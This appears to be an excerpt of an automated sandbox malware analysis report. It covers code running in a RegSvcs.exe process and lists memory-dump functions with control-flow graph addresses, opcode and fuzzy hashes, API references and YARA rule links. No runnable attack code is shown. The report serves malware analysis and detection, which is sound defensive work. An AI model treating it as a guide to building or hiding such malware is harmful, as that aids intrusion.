                                                control_flow_graph 958 1584804-158489c 961 158489e-15848a9 958->961 962 15848e6-15848e8 958->962 961->962 964 15848ab-15848b7 961->964 963 15848ea-1584902 962->963 971 158494c-158494e 963->971 972 1584904-158490f 963->972 965 15848b9-15848c3 964->965 966 15848da-15848e4 964->966 968 15848c5 965->968 969 15848c7-15848d6 965->969 966->963 968->969 969->969 970 15848d8 969->970 970->966 974 1584950-15849a9 971->974 972->971 973 1584911-158491d 972->973 975 158491f-1584929 973->975 976 1584940-158494a 973->976 983 15849ab-15849b1 974->983 984 15849b2-15849c0 974->984 978 158492b 975->978 979 158492d-158493c 975->979 976->974 978->979 979->979 980 158493e 979->980 980->976 983->984 987 15849c8-15849d2 984->987 988 15849dc-1584a0f 987->988 991 1584a1f-1584a23 988->991 992 1584a11-1584a15 988->992 994 1584a33-1584a37 991->994 995 1584a25-1584a29 991->995 992->991 993 1584a17-1584a1a call 1580ab8 992->993 993->991 998 1584a39-1584a3d 994->998 999 1584a47-1584a4b 994->999 995->994 997 1584a2b-1584a2e call 1580ab8 995->997 997->994 998->999 1001 1584a3f 998->1001 1002 1584a5b 999->1002 1003 1584a4d-1584a51 999->1003 1001->999 1005 1584a5c 1002->1005 1003->1002 1004 1584a53 1003->1004 1004->1002 1005->1005
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j$\V}j
                                                • API String ID: 0-799745403
                                                • Opcode ID: c88ebcbacf758a1b1c862896cb70dbb46d8d6a4df769518b152605cd994bf2a6
                                                • Instruction ID: 47780b8161104595db0d8c3b3c0f7568742f45bd65dd624289bd7cd29bba70a5
                                                • Opcode Fuzzy Hash: c88ebcbacf758a1b1c862896cb70dbb46d8d6a4df769518b152605cd994bf2a6
                                                • Instruction Fuzzy Hash: 7B713870E0024ACFEB10EFA9D98179DBBF2BF48714F148529E815BB250EB749845CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0669E191 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1755 669e191-669e1ab 1756 669e1ad-669e1d4 call 669d578 1755->1756 1757 669e1d5-669e1f4 call 669d584 1755->1757 1763 669e1fa-669e23a 1757->1763 1764 669e1f6-669e1f9 1757->1764 1769 669e23d-669e259 1763->1769 1772 669e25b-669e25e 1769->1772 1773 669e25f-669e274 1769->1773 1773->1769 1775 669e276-669e2ec GlobalMemoryStatusEx 1773->1775 1778 669e2ee-669e2f4 1775->1778 1779 669e2f5-669e31d 1775->1779 1778->1779
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1401938166.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_6690000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f36278e3122276fbfed82a7073f228fca10aec5333e7119a6934827b3b1cf94
                                                • Instruction ID: 8bb1c3a1e04b0cd88d54f1cf04d9a5bd83a5cd505e48e435508115a6f818fceb
                                                • Opcode Fuzzy Hash: 9f36278e3122276fbfed82a7073f228fca10aec5333e7119a6934827b3b1cf94
                                                • Instruction Fuzzy Hash: 6B412671D043A59FDB14CFA5D8406AEBBF5AF8A210F14856BD805A7281DB789841CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0669E278 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1782 669e278-669e2b6 1783 669e2be-669e2ec GlobalMemoryStatusEx 1782->1783 1784 669e2ee-669e2f4 1783->1784 1785 669e2f5-669e31d 1783->1785 1784->1785
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0669E2DF
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1401938166.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_6690000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 2e80f3b137610c1c03d0fb3af0d059b92cdb9fc0dcb8d5cd4e3cd89c186e8cd4
                                                • Instruction ID: 40bf107dc0b7199db5af7ff12f56f770e3032fb8b7bb148c439cd38cdc0a3ed9
                                                • Opcode Fuzzy Hash: 2e80f3b137610c1c03d0fb3af0d059b92cdb9fc0dcb8d5cd4e3cd89c186e8cd4
                                                • Instruction Fuzzy Hash: 521123B1C0065A9BCB10CF9AC444BDEFBF4EF48324F14852AD818A7240D778A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01583E76 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1854 1583e76-1583ee6 1856 1583ee8-1583ef3 1854->1856 1857 1583f30-1583f32 1854->1857 1856->1857 1859 1583ef5-1583f01 1856->1859 1858 1583f34-1583f8c 1857->1858 1868 1583f8e-1583f99 1858->1868 1869 1583fd6-1583fd8 1858->1869 1860 1583f03-1583f0d 1859->1860 1861 1583f24-1583f2e 1859->1861 1862 1583f0f 1860->1862 1863 1583f11-1583f20 1860->1863 1861->1858 1862->1863 1863->1863 1865 1583f22 1863->1865 1865->1861 1868->1869 1871 1583f9b-1583fa7 1868->1871 1870 1583fda-1583ff2 1869->1870 1878 158403c-158403e 1870->1878 1879 1583ff4-1583fff 1870->1879 1872 1583fa9-1583fb3 1871->1872 1873 1583fca-1583fd4 1871->1873 1874 1583fb5 1872->1874 1875 1583fb7-1583fc6 1872->1875 1873->1870 1874->1875 1875->1875 1877 1583fc8 1875->1877 1877->1873 1880 1584040-1584052 1878->1880 1879->1878 1881 1584001-158400d 1879->1881 1888 1584059-158408e 1880->1888 1882 158400f-1584019 1881->1882 1883 1584030-158403a 1881->1883 1884 158401b 1882->1884 1885 158401d-158402c 1882->1885 1883->1880 1884->1885 1885->1885 1887 158402e 1885->1887 1887->1883 1889 1584094-15840a2 1888->1889 1890 15840ab-158410b 1889->1890 1891 15840a4-15840aa 1889->1891 1898 158411b-158411f 1890->1898 1899 158410d-1584111 1890->1899 1891->1890 1901 158412f-1584133 1898->1901 1902 1584121-1584125 1898->1902 1899->1898 1900 1584113 1899->1900 1900->1898 1904 1584143-1584147 1901->1904 1905 1584135-1584139 1901->1905 1902->1901 1903 1584127-158412a call 1580ab8 1902->1903 1903->1901 1908 1584149-158414d 1904->1908 1909 1584157-158415b 1904->1909 1905->1904 1907 158413b-158413e call 1580ab8 1905->1907 1907->1904 1908->1909 1911 158414f-1584152 call 1580ab8 1908->1911 1912 158416b-158416f 1909->1912 1913 158415d-1584161 1909->1913 1911->1909 1915 158417f 1912->1915 1916 1584171-1584175 1912->1916 1913->1912 1914 1584163 1913->1914 1914->1912 1919 1584180 1915->1919 1916->1915 1918 1584177 1916->1918 1918->1915 1919->1919
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j
                                                • API String ID: 0-4284003065
                                                • Opcode ID: 43e7026fc06c94a69efe6fbd4cd5627fd5c30d12486d536dd105abce8e83f88f
                                                • Instruction ID: df1477325c38d9f8e2d61dec42d32bbb1ab46ccfd1eb7fdedcc506be70026835
                                                • Opcode Fuzzy Hash: 43e7026fc06c94a69efe6fbd4cd5627fd5c30d12486d536dd105abce8e83f88f
                                                • Instruction Fuzzy Hash: F6914D70E0024ADFDB10EFA8D9817DEBBF2BF48714F148529E815BB254DB789846CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0158F4C5 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1967 158f4c5-158f4cc 1968 158f4ce-158f4f3 1967->1968 1969 158f4b5-158f4bc 1967->1969 1970 158f4f5-158f4f8 1968->1970 1971 158f4fa-158f516 1970->1971 1972 158f51b-158f51d 1970->1972 1971->1972 1973 158f51f 1972->1973 1974 158f524-158f527 1972->1974 1973->1974 1974->1970 1975 158f529-158f54f 1974->1975 1981 158f556-158f584 1975->1981 1986 158f5fb-158f61f 1981->1986 1987 158f586-158f590 1981->1987 1995 158f629 1986->1995 1996 158f621 1986->1996 1990 158f5a8-158f5f9 1987->1990 1991 158f592-158f598 1987->1991 1990->1986 1990->1987 1993 158f59a 1991->1993 1994 158f59c-158f59e 1991->1994 1993->1990 1994->1990 1996->1995
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ]
                                                • API String ID: 0-3352871620
                                                • Opcode ID: 623b9f6eb96202d90a3928f5a6a51eb03431f4fbfb8503b57df35dc97fa09071
                                                • Instruction ID: debccc86e3b7467b9ba0fcecfc23d569932ba560244f60d2ca37719e0cb72899
                                                • Opcode Fuzzy Hash: 623b9f6eb96202d90a3928f5a6a51eb03431f4fbfb8503b57df35dc97fa09071
                                                • Instruction Fuzzy Hash: E541CE307002019FEB16AF38985476E3AE2BB89644F24456ED406EF395DF38CC42DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01587908 Relevance: .6, Instructions: 557COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c23729ab3410584233cb81023ff8de73a5d21b427534e343e4df86057b5bec8
                                                • Instruction ID: 79d6a649ddec72b75fcfd438278b897f7373159e57ab3e659481925a599d4880
                                                • Opcode Fuzzy Hash: 1c23729ab3410584233cb81023ff8de73a5d21b427534e343e4df86057b5bec8
                                                • Instruction Fuzzy Hash: AA125D317002128BDB5AAE38E54062D72ABFBCE290B209939D506DF351DF7EDC468F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01589364 Relevance: .4, Instructions: 365COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28647a3b2cc87a2e393e22bc305e677bc03764c320ea808ba51055948ccd432e
                                                • Instruction ID: 80992d4cb0bbdd3c91da6f4665a950f4affd7c95c96943c834b49d6aecc567c5
                                                • Opcode Fuzzy Hash: 28647a3b2cc87a2e393e22bc305e677bc03764c320ea808ba51055948ccd432e
                                                • Instruction Fuzzy Hash: 7AD17B34B002158FDB15EF68D894AAEBBB2FBC9314F248469E506EB391DB35DC41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01584A8E Relevance: .3, Instructions: 256COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3460af13c7aeb4e2caa7bfecb6e033b9c04f5210a56b31fb3c1910d05753514
                                                • Instruction ID: 5fd7a6cfe2b8543b05406442a51fd5e61a2e8c6879b5dcd6fb1c3b281d052e9a
                                                • Opcode Fuzzy Hash: b3460af13c7aeb4e2caa7bfecb6e033b9c04f5210a56b31fb3c1910d05753514
                                                • Instruction Fuzzy Hash: 28A13A70E0025ACFEF10EFA8D98579DBBF2BF48314F148529D815BB294EB749885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01586EE8 Relevance: .1, Instructions: 143COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06b39ce42ba801c6ea3eef0ca53aaf65d8c4b28292cf837d5361fa1e1fc24ac7
                                                • Instruction ID: 0647d057628cc84c4730bad0b82d27e5a0d079ffdcfcfa18254b2bd405d72c08
                                                • Opcode Fuzzy Hash: 06b39ce42ba801c6ea3eef0ca53aaf65d8c4b28292cf837d5361fa1e1fc24ac7
                                                • Instruction Fuzzy Hash: 52419E35B00219DFDB15EB68D4507AEB7B6FF8A300F20852AE415FF291DB7598428B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01586754 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ec22eb32c042a78dedab0c12ed291b0abb36ce921c0dde68621bef60cf287ff
                                                • Instruction ID: 74f0738a635ee4b86f0f0f156553bed9fda1e35a5a20b777a25d391c4ec22b9e
                                                • Opcode Fuzzy Hash: 3ec22eb32c042a78dedab0c12ed291b0abb36ce921c0dde68621bef60cf287ff
                                                • Instruction Fuzzy Hash: 49510375E002188FDB18DFA9C885B9EBBF1FF48314F14852AE815BB391DB74A844CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0158676C Relevance: .1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72a52749702275b85d620260ed04447646772c7d2c499329f2af28055d975624
                                                • Instruction ID: fe406fb8eba96beb9717d95d9f985bb9955b774fffdb7d9e74018e6812aa9a85
                                                • Opcode Fuzzy Hash: 72a52749702275b85d620260ed04447646772c7d2c499329f2af28055d975624
                                                • Instruction Fuzzy Hash: 4E510374E002188FDB18DFA9C885B9EBBF1FF48314F54852AE815BB391D774A844CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01581110 Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37b72a051a92204a85b0daf8f9642669100da04c8f823fc45d547ff72e059c8a
                                                • Instruction ID: 0c41dce526c12c85ddf9df235da49bab8e908841805828a54ca9d69220eecaf4
                                                • Opcode Fuzzy Hash: 37b72a051a92204a85b0daf8f9642669100da04c8f823fc45d547ff72e059c8a
                                                • Instruction Fuzzy Hash: 38512C321123418FDB0AEF68F884A4A3B79FB5674470491FDD0416B226EB7D6D49CF82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01586CDF Relevance: .1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c0e4aebd2afa9e176983f4351d51bd0106c2ea00dd5ca5775092be4c0b09a90
                                                • Instruction ID: 7754e0ba4e5b6b8aec250929440d03f2d1574eaaa4ef7656cb7f2a2146e8a0fd
                                                • Opcode Fuzzy Hash: 0c0e4aebd2afa9e176983f4351d51bd0106c2ea00dd5ca5775092be4c0b09a90
                                                • Instruction Fuzzy Hash: F551F375E002188FEB18DFA9C885B9EBBB1BF48314F14851AE815BB391DB74A844CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01581138 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e167aa0808fafc19ba7338412e954c8dab09ca6496de55bc947bb3c4dac084d
                                                • Instruction ID: 48e14c73a7f9e7200372d4891d167d705b424ff00103871d8b25498a1e1f0fc0
                                                • Opcode Fuzzy Hash: 7e167aa0808fafc19ba7338412e954c8dab09ca6496de55bc947bb3c4dac084d
                                                • Instruction Fuzzy Hash: E951D9322123458FDB0AEF68F884A5A3B7AFB5574430191FDD0416B226EB7D6D49CF82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01584F88 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a00973120bc3f28cbe997fd8350a46e203a04a3d9bd7d7cca071246c92af6a78
                                                • Instruction ID: 171f441aaaabb6542e12f620c24e2b0577626740f442034fdebcc4719698e23c
                                                • Opcode Fuzzy Hash: a00973120bc3f28cbe997fd8350a46e203a04a3d9bd7d7cca071246c92af6a78
                                                • Instruction Fuzzy Hash: F9315934A10245CFDB14EF69D55879EBBF1FF88204F2044A9E50AEB3A0DB7A9C45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0158F388 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34cbae952a122f276a4140e976b2502e1e0a50dd27982caf47373f328e625210
                                                • Instruction ID: c50d06b8da446bae84f2b02cf79a5d802436d2fcbf189c2a034ae6de77c35fc4
                                                • Opcode Fuzzy Hash: 34cbae952a122f276a4140e976b2502e1e0a50dd27982caf47373f328e625210
                                                • Instruction Fuzzy Hash: 01318031E006159BDB15DFA8D85469EB7B6FF89300F10892AE806FB761DB75EC82CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015826DC Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68f95cd5156eb30d3d0ef0a62319c228e9c36ceed55df1414944257e39054eb2
                                                • Instruction ID: 91738cf210a11b556a909098e97c6a9d42790f6f1280da6252d70e7e9b8425f3
                                                • Opcode Fuzzy Hash: 68f95cd5156eb30d3d0ef0a62319c228e9c36ceed55df1414944257e39054eb2
                                                • Instruction Fuzzy Hash: B141FDB0D003489FEB20DFA9C484A9EBFF5BF48314F14852AE419AB250DB759946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0158F398 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3af0895053af8884e7d82b2a4d1e6d23c139715f87325a01df7becd2e73a0ffb
                                                • Instruction ID: 530a3d42a92c2711dbbe658088ad526724b65ec5de7eab6e6c4e4189c1f1845a
                                                • Opcode Fuzzy Hash: 3af0895053af8884e7d82b2a4d1e6d23c139715f87325a01df7becd2e73a0ffb
                                                • Instruction Fuzzy Hash: 01314E31E006159BDB15DFA8D454A9EB7B6FF89300F10852AE806FB761DB75AC82CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015826E8 Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b80d35eb5d872656fc7a144378f7a2a6c4d27425fe62935ba5c1f81b9f87a924
                                                • Instruction ID: 0dc8edf1a719cdf67b8c2094ed245e127be69ef545fb30cc37333fda6cb4ca80
                                                • Opcode Fuzzy Hash: b80d35eb5d872656fc7a144378f7a2a6c4d27425fe62935ba5c1f81b9f87a924
                                                • Instruction Fuzzy Hash: 8A41CFB0D003489FDB14DF99C484A9EBFF5FF48314F14842AE819AB254DB75A946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01589250 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b7e6e3707b8355c67cdd6b7ce72ad57649e2715ae68b0455519ae36a183ee08
                                                • Instruction ID: c8ae3489818a59f7d839f3f9b9ae5030d377a5576649942501e44ac5ba717ac4
                                                • Opcode Fuzzy Hash: 0b7e6e3707b8355c67cdd6b7ce72ad57649e2715ae68b0455519ae36a183ee08
                                                • Instruction Fuzzy Hash: C031C531E102099BDB15DFA8D8407AEF7B6FFC9304F108519E806FB251EB709841CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01589260 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ed160136144908be6b0515c15ba82fd486c89f1ec01ed8b88a0b09defda7191
                                                • Instruction ID: 24e9eb34aff57b8043d70a5b2c7eff11470d4609a6e38cf33a07fc7e8fc95974
                                                • Opcode Fuzzy Hash: 3ed160136144908be6b0515c15ba82fd486c89f1ec01ed8b88a0b09defda7191
                                                • Instruction Fuzzy Hash: 91219431E102099BDB15DFA8D8506AEF7B6FFC9304F10C619E806FB251DB709845CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015816A0 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9b82fd30eda704d1a8d05a5eb0f02ed6c0ffb43a50ca88bafc840e6e8b10f12
                                                • Instruction ID: 12eb298c6c2ee269e9c4089d408e79ede4d12593ca5d95abdff5acae009b1364
                                                • Opcode Fuzzy Hash: e9b82fd30eda704d1a8d05a5eb0f02ed6c0ffb43a50ca88bafc840e6e8b10f12
                                                • Instruction Fuzzy Hash: 2E21A1302106049FEB26BE28E884B5E376DFB45344F109A38E446EB256EB7DDC428B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01589150 Relevance: .1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4d113c8bb20e8f822fac7082563435bf8bfcfbdd7d046eabdb9239e99b72547
                                                • Instruction ID: 85bdcf10f1de39309ed813732f7dab4a633ecec3f252ffb5039a9043d46331e0
                                                • Opcode Fuzzy Hash: a4d113c8bb20e8f822fac7082563435bf8bfcfbdd7d046eabdb9239e99b72547
                                                • Instruction Fuzzy Hash: 3921B534E046059FDB19DFA9D8546EEF7B2BFC5304F10861AE816BB381DB709945CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0153D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394625491.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_153d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 454def64be3689f7e611edcfcc21ca06e6fd0bf33bec74d862ce5c4f805a191d
                                                • Instruction ID: c7340906aa4189dc18eeec3cf8c11a86f5c63f3abae0f797927d93a9a73c006f
                                                • Opcode Fuzzy Hash: 454def64be3689f7e611edcfcc21ca06e6fd0bf33bec74d862ce5c4f805a191d
                                                • Instruction Fuzzy Hash: 6621FF716042049FDB15DFA4D880B2AFBB5FBC8654F60C969E84A0F252D33AD847CA62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01589160 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f97bd75d660bd39ae3693cbf1c3dcb4fd817488c14ec4fdb325a59945abf7353
                                                • Instruction ID: ae978ff8a7ae24f090361f0d6a129b90ceb9c7f98249d19791d3e52d44a3fd98
                                                • Opcode Fuzzy Hash: f97bd75d660bd39ae3693cbf1c3dcb4fd817488c14ec4fdb325a59945abf7353
                                                • Instruction Fuzzy Hash: A9218034E0420A9BCB19DFA9D8545EEF7B2BFC9304F20861AE816BB340DB70A945CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01581888 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43a785bc979c9135cd4fe0b2d894aed6a39797de8a7dc882ec78ffdee4cb7e72
